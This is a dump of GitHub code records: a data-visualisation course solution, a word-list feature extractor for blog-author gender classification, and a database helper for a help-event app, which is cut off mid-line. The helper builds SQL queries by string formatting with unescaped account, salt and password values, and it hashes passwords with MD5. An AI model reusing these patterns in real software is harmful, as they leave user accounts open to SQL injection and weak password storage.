"line_number": 12, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 13, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 14, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 15, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 16, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.Uuid", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 22, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 23, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 24, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 25, "usage_type": "name"}, {"api_name": "uuid.UUID", "line_number": 25, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 26, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.Uuid", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 31, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "32824013431", "text": "from __future__ import print_function\nimport utilities as DDM17\nimport pandas as pd\nimport sqlite3 as lite\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef read_visualisation_data():\n \"\"\"\n Read in the visualisation data from the database using Pandas\n\n Returns\n -------\n table_names : list\n A list of table names (or data set names)\n data : dict\n A dictionary of tables. The top-level key is the name of the data\n set. (Set1, Set2 etc.). The value of this is a pandas table with\n keys x & y. So data['Set1'] is a pandas table for instance.xs\n\n\n \"\"\"\n\n db = 'ThirteenDatasets.db'\n con = lite.connect(db)\n\n # Get the tables.\n rows = con.execute('SELECT name FROM sqlite_master WHERE type=\"table\"')\n table_names = [row[0] for row in rows]\n\n # Now loop over these and create a dict with each set.\n data = dict()\n for tname in table_names:\n t = pd.read_sql_query(\"Select x, y From {0}\".format(tname), con)\n data[tname] = t\n\n con.close()\n \n # I return both the list of table names and the\n # data dictionary mostly for convenience. \n return table_names, data\n\n\ndef data_to_pandas_df(tnames, data):\n \"\"\"Convert data dict to pandas data frame\n\n This routine takes the data dictionary from read_visualisation_data\n and creates a Pandas data frame with x & y as keys as well as a column\n with the dataset name\n\n Parameters\n ----------\n tnames : list\n A list of names of the tables to include. Normally taken to be \n the output of read_visualisation_data\n data : dict\n A dict with the data, each dataset indexed by the table name.\n This is the format returned by read_visualisation_data\n \"\"\"\n\n # Since the datasets here have the same length, I could\n # create the arrays first and then populate them - that\n # would be faster and I would avoid the asarray gymnastics\n # below to keep it as numpy arrays.\n #\n # But numpy append is fine for this.\n\n dataset = []\n first = True\n for i, tn in enumerate(tnames):\n xcoord = np.asarray(data[tn]['x'].data)\n ycoord = np.asarray(data[tn]['y'].data)\n if (first):\n x = xcoord.copy()\n y = ycoord.copy()\n first = False\n else:\n x = np.append(x, xcoord)\n y = np.append(y, ycoord)\n\n # Append the table name for each x value\n label = [tn for i in range(len(xcoord))]\n dataset = dataset + label\n\n df = pd.DataFrame({'x': x, 'y': y, 'set': dataset})\n\n return df\n \ndef show_visualisations_multipanel(tnames, data):\n \"\"\"\n Show 2D visualisations for the data\n\n Parameters\n ----------\n tnames : list\n A list of names of the tables to plot. Normally taken to be \n the output of read_visualisation_data\n data : dict\n A dict with the data, each dataset indexed by the table name.\n This is the format returned by read_visualisation_data\n \n \"\"\"\n\n nx = 5\n ny = 3\n fig, axes = plt.subplots(ncols=nx, nrows=ny, figsize=(12, 8),\n sharex=True, sharey=True)\n plt.tick_params(axis='both', which='major', labelsize=8)\n dims = axes.shape\n print(\"Axes shape=\", dims)\n for i, tn in enumerate(tnames):\n x, y = data[tn]['x'], data[tn]['y']\n\n i_x, i_y = np.unravel_index(i, dims)\n axes[i_x, i_y].scatter(x, y, 10)\n axes[i_x, i_y].text(0.95, 0.93, tn, \n transform=axes[i_x, i_y].transAxes, ha='right', va='top')\n axes[i_x, i_y].set_xlim(0, 120)\n axes[i_x, i_y].set_ylim(0, 120)\n \n axes[2, 3].set_axis_off()\n axes[2, 4].set_axis_off()\n\n # I also want to remove white-space between the panels\n fig.subplots_adjust(hspace=0)\n plt.show()\n\n\ndef get_statistics(tnames, data):\n \"\"\"Calculate basic statistics for the data\n\n The data is assumed to be a dictionary returned from read_visualisation_data() \n \"\"\"\n\n # I know the number of data sets so I can make a set\n # of result arrays. There are more elegant ways to do this\n # for instance by using the .description function of Pandas\n # DataFrames, but I thought this was clearer.\n #\n # In general this is a less good solution though - because it\n # hardcodes information in several places\n n_datasets = len(tnames)\n stats = {'x': {'mean': np.zeros(n_datasets),\n 'median': np.zeros(n_datasets),\n 'std': np.zeros(n_datasets),\n '25%': np.zeros(n_datasets),\n '75%': np.zeros(n_datasets),\n 'max': np.zeros(n_datasets),\n 'min': np.zeros(n_datasets)},\n 'y': {'mean': np.zeros(n_datasets),\n 'median': np.zeros(n_datasets),\n 'std': np.zeros(n_datasets),\n '25%': np.zeros(n_datasets),\n '75%': np.zeros(n_datasets),\n 'max': np.zeros(n_datasets),\n 'min': np.zeros(n_datasets)}}\n\n for i, tn in enumerate(tnames):\n for key in ('x', 'y'):\n var = data[tn][key]\n stats[key]['mean'][i] = np.mean(var)\n stats[key]['median'][i] = np.median(var)\n stats[key]['std'][i] = np.std(var)\n stats[key]['25%'][i] = np.percentile(var, 25.)\n stats[key]['75%'][i] = np.percentile(var, 75.)\n stats[key]['min'][i] = np.min(var)\n stats[key]['max'][i] = np.max(var)\n \n\n return stats\n\ndef get_statistics_compact(tnames, data):\n \"\"\"\n Equivalent to the above - shorter and a bit more flexible but\n also probably a bit more less clear?\n \"\"\"\n\n stats = {'x': dict(), 'y': dict()}\n\n first = True\n for tn in tnames:\n summary = data[tn].describe()\n\n # If we are doing the first round through we need to create\n # the lists\n todo = summary['x'].keys()\n for key in ('x', 'y'):\n for x_todo in todo:\n if first:\n stats[key][x_todo] = []\n stats[key][x_todo].append(summary[key][x_todo])\n \n first = False\n\n return stats\n\n\ndef get_statistics_extendable(tnames, data, functions=None):\n \"\"\"\n Equivalent to the above two, but this one is more extendible\n\n The functions argument should be an array of functions to\n apply to the data. If this is set to None the a default set \n of functions are applied, namely:\n\n functions = {'mean': np.mean, 'median': np.median,\n '25%': lambda x: np.percentile(x, 25.0),\n '75%': lambda x: np.percentile(x, 75.0)}\n \"\"\"\n\n stats = {'x': dict(), 'y': dict()}\n if functions is None:\n functions = {'mean': np.mean, 'median': np.median,\n '25%': lambda x: np.percentile(x, 25.0),\n '75%': lambda x: np.percentile(x, 75.0)}\n n_datasets = len(tnames)\n first = True\n for i, tn in enumerate(tnames):\n for key in ('x', 'y'):\n var = data[tn][key]\n \n for todo, func in functions.iteritems():\n if first:\n stats[key][todo] = np.zeros(n_datasets)\n stats[key][todo][i] = func(var)\n \n first = False\n\n return stats\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n tnames, data = read_visualisation_data()\n\n show_visualisations_multipanel(tnames, data)\n", "repo_name": "jbrinchmann/MLD2019", "sub_path": "ProblemSets/2 - Inference and Visualisation/Solution/problem2_2.py", "file_name": "problem2_2.py", "file_ext": "py", "file_size_in_byte": 7580, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlite3.connect", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 79, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tick_params", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "numpy.unravel_index", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 213, "usage_type": "attribute"}, {"api_name": "numpy.median", "line_number": 213, "usage_type": "attribute"}, {"api_name": "numpy.percentile", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 224, "usage_type": "call"}]}
+{"seq_id": "13945849021", "text": "import nltk\n\ndef genderDifferencesFeatures(text):\n\n\tgroom = \"\"\"cleaner clean washer wash perfume shave shaved shampoo cleansing soap shower\n\ttoothpaste cream facewash moisturizer nail lipstick makeup\"\"\"\n\n\tsleep = \"\"\"tiresome sleeping dazed sleeps insomnia napping nap siesta nightmare dream dreams bed\n\tpillow\"\"\"\n\n\ti = \"\"\"me myself mine my i\"\"\"\n\n\teating = \"\"\"fat dinner tasting drunken fed breakfast cookie eat tasted skinny cookbook\"\"\"\n\n\tdisgust = \"\"\"sickening revolting horror sick offensive obscene nauseous wicked\"\"\"\n\n\tfear = \"\"\"suspense creep dismay fright terrible terror afraid scare alarmed panicked panic\"\"\"\n\n\tsewing = \"\"\"mending stiching knitting knitter knit mend tailor suture embroidery seamstress needle\"\"\"\n\n\tpurpleness = \"\"\"purple mauve magenta lilac lavender orchid violet mulberry purply\"\"\"\n\n\tsweetness = \"\"\"syrup honey sugar bakery nectar sweet frost sugary dessert glaze nut\"\"\"\n\n\tbrownness = \"\"\"coffee biscuit biscuits walnut rust berry brown brunette cinnamon mahogany caramel chocolate\"\"\"\n\n\tchastity = \"\"\"shame elegant decent virtue virgin delicate faithful faithfulness platonic purity spotless\"\"\"\n\n\trelig = \"\"\"bless satanism angel communion spirit lord immortal theology prayers\"\"\"\n\n\tmetaph = \"\"\"suicide meditation cemetary temples drained immortalized mercy mourning\"\"\"\n\n\ttv = \"\"\"show ad comedies comedy tv actors drama soaps video theatres commercials commercial film films\"\"\"\n\n\tjob = \"\"\"credentials department financials desktop manage employee work career\"\"\"\n\n\toponent = \"\"\"finalist rival enemy competitor foe opposite defendant player dissident\"\"\"\n\n\ttheology = \"\"\"creed scholastic religious secularism theology religion divine faith dogma\"\"\"\n\n\tuniformity = \"\"\"evenness constancy constant persistence accordance steadiness steady firm firmness stable stability\"\"\"\n\n\tengineering = \"\"\"automotive process industrial manufacture measure construction technician\"\"\"\n\n\tinfluence = \"\"\"power force weak weakness inflexible ineffective charisma charm wimpy\"\"\"\n\n\t\n\tcountGroom = countSleep = countI = countEating = countDisgust = countFear = countSewing = 0\n\tcountPurpleness = countSweetness = countBrownness = countChastity = countRelig = countInfluence = 0\n\tcountMetaph = countTV = countJob = countOponent = countTheology = countUniformity = countEngineering = 0\n\n\ttotalWords = len(text.split())\n\t#print(totalWords)\n\n\ttext = text.lower()\n\ttext = nltk.word_tokenize(text)\n\tgroom = nltk.word_tokenize(groom)\n\tsleep = nltk.word_tokenize(sleep)\n\ti = nltk.word_tokenize(i)\n\teating = nltk.word_tokenize(eating)\n\tdisgust = nltk.word_tokenize(disgust)\n\tfear = nltk.word_tokenize(fear)\n\tsewing = nltk.word_tokenize(sewing)\n\tpurpleness = nltk.word_tokenize(purpleness)\n\tsweetness = nltk.word_tokenize(sweetness)\n\tbrownness = nltk.word_tokenize(brownness)\n\tchastity = nltk.word_tokenize(chastity)\n\trelig = nltk.word_tokenize(relig)\n\tinfluence = nltk.word_tokenize(influence)\n\tmetaph = nltk.word_tokenize(metaph)\n\ttv = nltk.word_tokenize(tv)\n\tjob = nltk.word_tokenize(job)\n\toponent = nltk.word_tokenize(oponent)\n\ttheology = nltk.word_tokenize(theology)\n\tuniformity = nltk.word_tokenize(uniformity)\n\tengineering = nltk.word_tokenize(engineering)\n\t\n\n\tfor word in text:\n\t\tif word in groom:\n\t\t\tcountGroom += 1\n\n\t\tif word in sleep:\n\t\t\tcountSleep += 1\n\n\t\tif word in i:\n\t\t\tcountI += 1\n\n\t\tif word in eating:\n\t\t\tcountEating += 1\n\n\t\tif word in disgust:\n\t\t\tcountDisgust += 1\n\n\t\tif word in fear:\n\t\t\tcountFear += 1\n\n\t\tif word in sewing:\n\t\t\tcountSewing += 1\n\n\t\tif word in purpleness:\n\t\t\tcountPurpleness += 1\n\n\t\tif word in sweetness:\n\t\t\tcountSweetness += 1\n\n\t\tif word in brownness:\n\t\t\tcountBrownness += 1\n\n\t\tif word in chastity:\n\t\t\tcountChastity += 1\n\n\t\tif word in relig:\n\t\t\tcountRelig += 1\n\n\t\tif word in metaph:\n\t\t\tcountMetaph += 1\n\n\t\tif word in tv:\n\t\t\tcountTV += 1\n\n\t\tif word in job:\n\t\t\tcountJob += 1\n\n\t\tif word in oponent:\n\t\t\tcountOponent += 1\n\n\t\tif word in theology:\n\t\t\tcountTheology += 1\n\n\t\tif word in uniformity:\n\t\t\tcountUniformity += 1\n\n\t\tif word in engineering:\n\t\t\tcountEngineering += 1\n\n\t\tif word in influence:\n\t\t\tcountInfluence += 1\n\n\ttry:\n\t\tcountGroom /= 1.0 * totalWords\n\texcept:\n\t\tcountGroom = 0\n\ttry:\n\t\tcountSleep /= 1.0 * totalWords\n\texcept:\n\t\tcountSleep = 0\n\ttry:\n\t\tcountI /= 1.0\n\texcept:\n\t\tcountI = 0\n\ttry:\n\t\tcountEating /= 1.0 * totalWords\n\texcept:\n\t\tcountEating = 0\n\ttry:\n\t\tcountDisgust /= 1.0 *totalWords\n\texcept:\n\t\tcountDisgust = 0\n\ttry:\n\t\tcountFear /= 1.0 * totalWords\n\texcept:\n\t\tcountFear = 0\n\ttry:\n\t\tcountSewing /= 1.0 * totalWords\n\texcept:\n\t\tcountSewing = 0\n\ttry:\n\t\tcountPurpleness /= 1.0 * totalWords\n\texcept:\n\t\tcountPurpleness = 0\n\ttry:\n\t\tcountBrownness /= 1.0 * totalWords\n\texcept:\n\t\tcountBrownness = 0\n\ttry:\n\t\tcountSweetness /= 1.0 * totalWords\n\texcept:\n\t\tcountSweetness = 0\n\ttry:\n\t\tcountChastity /= 1.0 * totalWords\n\texcept:\n\t\tcountChastity = 0\n\ttry:\n\t\tcountRelig /= 1.0 * totalWords\n\texcept:\n\t\tcountRelig = 0\n\ttry:\n\t\tcountMetaph /= 1.0 * totalWords\n\texcept:\n\t\tcountMetaph = 0\n\ttry:\n\t\tcountJob /= 1.0 * totalWords\n\texcept:\n\t\tcountJob = 0\n\ttry:\n\t\tcountTV /= 1.0 * totalWords\n\texcept:\n\t\tcountTV = 0\n\ttry:\n\t\tcountOponent /= 1.0 * totalWords\n\texcept:\n\t\tcountOponent = 0\n\ttry:\n\t\tcountTheology /= 1.0 * totalWords\n\texcept:\n\t\tcountTheology = 0\n\ttry:\n\t\tcountUniformity /= 1.0 * totalWords\n\texcept:\n\t\tcountUniformity = 0\n\ttry:\n\t\tcountEngineering /= 1.0 * totalWords\n\texcept:\n\t\tcountEngineering = 0\n\ttry:\n\t\tcountInfluence /= 1.0 * totalWords\n\texcept:\n\t\tcountInfluence = 0\n\n\treturn(countGroom, countSleep, countI, countEating, countDisgust, countFear, countSewing, countPurpleness,\n\t\tcountSweetness, countBrownness, countChastity, countRelig, countMetaph, countJob, countTV, countOponent,\n\t\tcountTheology, countUniformity, countEngineering, countInfluence)\n\ntext = \"\"\"This is hopeless countless priceless and I am indecisive. so sorry sorry I am feeling terrible \nthat I am unable to fulfil a WONderful TV mathematical brutal vicious terrific problem.\"\"\"\nprint(genderDifferencesFeatures(text))\n", "repo_name": "srvCodes/Gender-Classification-of-Blog-Author", "sub_path": "genderDifferencesFeatures.py", "file_name": "genderDifferencesFeatures.py", "file_ext": "py", "file_size_in_byte": 5904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nltk.word_tokenize", "line_number": 56, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 57, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 58, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 59, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 60, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 61, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 62, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 63, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 64, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 65, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 66, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 67, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 68, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 69, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 70, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 71, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 72, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 73, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 74, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 75, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 76, "usage_type": "call"}]}
+{"seq_id": "14146794715", "text": "#!/usr/python\n\nimport sys\nimport random\nimport string\nimport hashlib\nimport MySQLdb\nimport ast\n\n\nfrom dbhelper import dbhelper\nfrom utils import KEY\n\n\n \n'''\nadd a new account to database.\n@params a dict data:\n includes account and password.\n@return -1 indicates params are not complete. Or account is not unique that leads to database fails.\n other number indicates success and the number is the id of the new account.\n'''\ndef add_account(data):\n if KEY.ACCOUNT not in data or KEY.PASSWORD not in data:\n return -1\n \n salt = ''.join(random.sample(string.ascii_letters, 8))\n md5_encode = hashlib.md5()\n md5_encode.update(data[KEY.PASSWORD]+salt)\n password = md5_encode.hexdigest()\n sql_account = \"insert into account (account, password, salt) values ('%s', '%s', '%s')\"\n sql_user = \"insert into user (id, nickname) values (%d, '%s')\"\n try:\n insert_id = dbhelper.insert(sql_account%(data[KEY.ACCOUNT], password, salt))\n dbhelper.insert(sql_user%(insert_id, data[KEY.ACCOUNT]))\n return insert_id\n except:\n return -1\n\n\n'''\nupdate information of an account.\n@params a dict data:\n includes id and chat_token:\n@return True if successfully modify chat_token\n False modification fails.\n'''\ndef update_account(data):\n if KEY.ID in data and KEY.CHAT_TOKEN in data:\n sql = \"update account set chat_token = '%s' where id = %d\"\n try:\n if dbhelper.execute(sql%(data[KEY.CHAT_TOKEN], data[KEY.ID])) > 0:\n return True\n except:\n return False\n else:\n return False\n\n\n'''\nmodify user's information.\n@params a dict data:\n options include user's name, nickname, gender, age, phone, location,\n (longitude and latitude), occupation, identity_id.\n@return True if successfully modify\n False modification fails.\n'''\ndef update_user(data):\n if KEY.ID not in data:\n return False\n result = True\n \n sql = \"\"\n if KEY.NAME in data:\n data[KEY.NAME] = MySQLdb.escape_string(data[KEY.NAME].encode(\"utf8\"))\n sql = \"update user set name = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.NAME], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.NICKNAME in data:\n data[KEY.NICKNAME] = MySQLdb.escape_string(data[KEY.NICKNAME].encode(\"utf8\"))\n sql = \"update user set nickname = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.NICKNAME], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.GENDER in data:\n sql = \"update user set gender = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.GENDER], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.AGE in data:\n sql = \"update user set age = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.AGE], data[KEY.ID]))\n result &= True\n except:\n result &= False\n \n if KEY.PHONE in data:\n sql = \"update user set phone = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.PHONE], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.LOCATION in data:\n data[KEY.LOCATION] = MySQLdb.escape_string(data[KEY.LOCATION].encode(\"utf8\"))\n sql = \"update user set location = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.LOCATION], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.LONGITUDE in data and KEY.LATITUDE in data:\n sql = \"update user set longitude = %f, latitude = %f where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.LONGITUDE], data[KEY.LATITUDE], data[KEY.ID]))\n result &= True\n except:\n result &= False\n elif not (KEY.LONGITUDE not in data and KEY.LATITUDE not in data):\n result &= False\n\n if KEY.OCCUPATION in data:\n sql = \"update user set occupation = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.OCCUPATION], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.IDENTITY_ID in data:\n sql = \"update user set identity_id = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.IDENTITY_ID], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n return result\n\n\n'''\nget salt of an account.\n@params include user's account.\n@return salt of an account.\n None if account not exists or database query error.\n'''\ndef get_salt(data):\n if KEY.ACCOUNT not in data:\n return None\n sql = \"select salt from account where account = '%s'\"\n try:\n res = dbhelper.execute_fetchone(sql%(data[KEY.ACCOUNT]))\n if res is None:\n return None\n else:\n return res[0]\n except:\n return None\n\n\n'''\nvalidate whether password is correct.\n@params includes user's account and password.\n password need to be md5 encode.\n@return user's id if password is correct.\n -1 otherwise.\n'''\ndef validate_password(data):\n if KEY.ACCOUNT not in data or KEY.PASSWORD not in data or KEY.SALT not in data:\n return -1\n sql = \"select id, password from account where account = '%s' and salt = '%s'\"\n user_id = -1\n password = None\n try:\n res = dbhelper.execute_fetchone(sql%(data[KEY.ACCOUNT], data[KEY.SALT]))\n if res is not None:\n user_id = res[0]\n password = res[1]\n except:\n pass\n finally:\n if password is None or data[KEY.PASSWORD] is None:\n return -1\n elif password == data[KEY.PASSWORD]:\n return user_id\n else:\n return -1\n\n\n'''\nmodify user's password to a new one, but not modify its salt value.\n@params include user's account. \n new password that encode with salt by md5.\n@return true if successfully modify.\n false otherwise.\n'''\ndef modify_password(data):\n if KEY.ACCOUNT not in data or KEY.PASSWORD not in data:\n return False\n sql = \"update account set password = '%s' where account = '%s'\" \n try:\n n = dbhelper.execute(sql%(data[KEY.PASSWORD], data[KEY.ACCOUNT]))\n if n > 0:\n return True\n else:\n return False\n except:\n return False\n \n \n'''\nget user's information, which includes user's name, nickname, gender ...... .\n@params include user's id.\n@return a json includes user's concrete information.\n None if params error or database query error.\n'''\ndef get_user_information(data):\n if KEY.ID not in data:\n return None\n sql = \"select * from user where id = %d\"\n try:\n res = dbhelper.execute_fetchone(sql%(data[KEY.ID]))\n if res is None:\n return None\n else:\n user = {}\n user[KEY.ID] = res[0]\n user[KEY.NAME] = res[1]\n user[KEY.NICKNAME] = res[2]\n user[KEY.GENDER] = res[3]\n user[KEY.AGE] = res[4]\n user[KEY.PHONE] = res[5]\n user[KEY.LOCATION] = res[6]\n user[KEY.LONGITUDE] = float(res[7])\n user[KEY.LATITUDE] = float(res[8])\n user[KEY.OCCUPATION] = res[9]\n user[KEY.REPUTATION] = float(res[10])\n user[KEY.IDENTITY_ID] = res[12]\n user[KEY.IS_VERIFY] = res[14]\n return user\n except:\n return None\n\n\n'''\nlaunch a help event by launcher.\n@params includes user's id and type of help event.\n help event types:\n 0 represents normal question.\n 1 represents nornal help.\n 2 represents emergency.\n other option params includes content of event, longitude and latitude of event.\n@return event_id if successfully launches.\n -1 if fails.\n'''\ndef add_event(data): \n if KEY.ID not in data or KEY.TYPE not in data:\n return -1\n sql = \"insert into event (launcher, type, time) values (%d, %d, now())\"\n event_id = -1\n try:\n event_id = dbhelper.insert(sql%(data[KEY.ID], data[KEY.TYPE]))\n if event_id > 0:\n data[KEY.EVENT_ID] = event_id\n update_event(data)\n return event_id\n except:\n return -1\n\n\n'''\nmodify information of a help event.\n@params includes event_id, which is id of the event to be modified.\n option params includes: content of event, longitude and latitude of event, state of event.\n@return True if successfully modifies.\n False otherwise.\n'''\ndef update_event(data):\n result = True\n sql = \"\"\n if KEY.CONTENT in data:\n data[KEY.CONTENT] = MySQLdb.escape_string(data[KEY.CONTENT].encode(\"utf8\"))\n sql = \"update event set content = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.CONTENT], data[KEY.EVENT_ID]))\n result &= True\n except:\n result &= False\n \n if KEY.LONGITUDE in data and KEY.LATITUDE in data:\n sql = \"update event set longitude = %f, latitude = %f where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.LONGITUDE], data[KEY.LATITUDE], data[KEY.EVENT_ID]))\n result &= True\n except:\n result &= False\n\n if KEY.STATE in data:\n if data[KEY.STATE] == 0:\n data[KEY.STATE] = 1\n sql = \"update event set state = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.STATE], data[KEY.EVENT_ID]))\n result &= True\n except:\n result &= False\n\n return result\n\n\n'''\nremove a help event by event launcher.\n@params includes user's id, which is remover. Actually, only the launcher can remove his/her event.\n event's id, which represents the event to be removed.\n@return True if successfully removes, or remover is not the launcher, actually nothing happens.\n False if fails.\n'''\ndef remove_event(data):\n if KEY.ID not in data or KEY.EVENT_ID not in data:\n return False\n sql = \"delete from event where id = %d and launcher = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.EVENT_ID], data[KEY.ID]))\n return True\n except:\n return False\n\n\n'''\nget information of a help event.\n@params includes id of the event to get.\n@return concrete information of the event:\n event_id, launcher's id and his/her nickname, content, type, time, longitude and latitude, state, number of followers, number of supporters and group points.\n None indicates fail query.\n'''\ndef get_event_information(data):\n if KEY.EVENT_ID not in data:\n return None\n event_info = None\n sql = \"select * from event where id = %d\"\n try:\n sql_result = dbhelper.execute_fetchone(sql%(data[KEY.EVENT_ID]))\n if sql_result is not None:\n event_info = {}\n event_info[KEY.EVENT_ID] = sql_result[0]\n event_info[KEY.LAUNCHER_ID] = sql_result[1]\n event_info[KEY.CONTENT] = sql_result[2]\n event_info[KEY.TYPE] = sql_result[3]\n event_info[KEY.TIME] = str(sql_result[4])\n event_info[KEY.LONGITUDE] = float(sql_result[5])\n event_info[KEY.LATITUDE] = float(sql_result[6])\n event_info[KEY.STATE] = sql_result[7]\n event_info[KEY.FOLLOW_NUMBER] = sql_result[8]\n event_info[KEY.SUPPORT_NUMBER] = sql_result[9]\n event_info[KEY.GROUP_PTS] = float(sql_result[10])\n user = {}\n user[KEY.ID] = event_info[KEY.LAUNCHER_ID]\n user = get_user_information(user)\n if user is not None:\n event_info[KEY.LAUNCHER] = user[KEY.NICKNAME]\n except:\n pass\n finally:\n return event_info\n\n\n'''\nget information of a collection of events.\n@params includes data, a json that contains user's id and type of events to get.\n get_event_id_list a method of getting event id list.\n@return a array of events. each element is information of an event in json form.\n'''\ndef get_events(data, get_event_id_list):\n event_id_list = get_event_id_list(data)\n event_list = []\n event_info = {}\n for event_id in event_id_list:\n event_info[KEY.EVENT_ID] = event_id\n event_info = 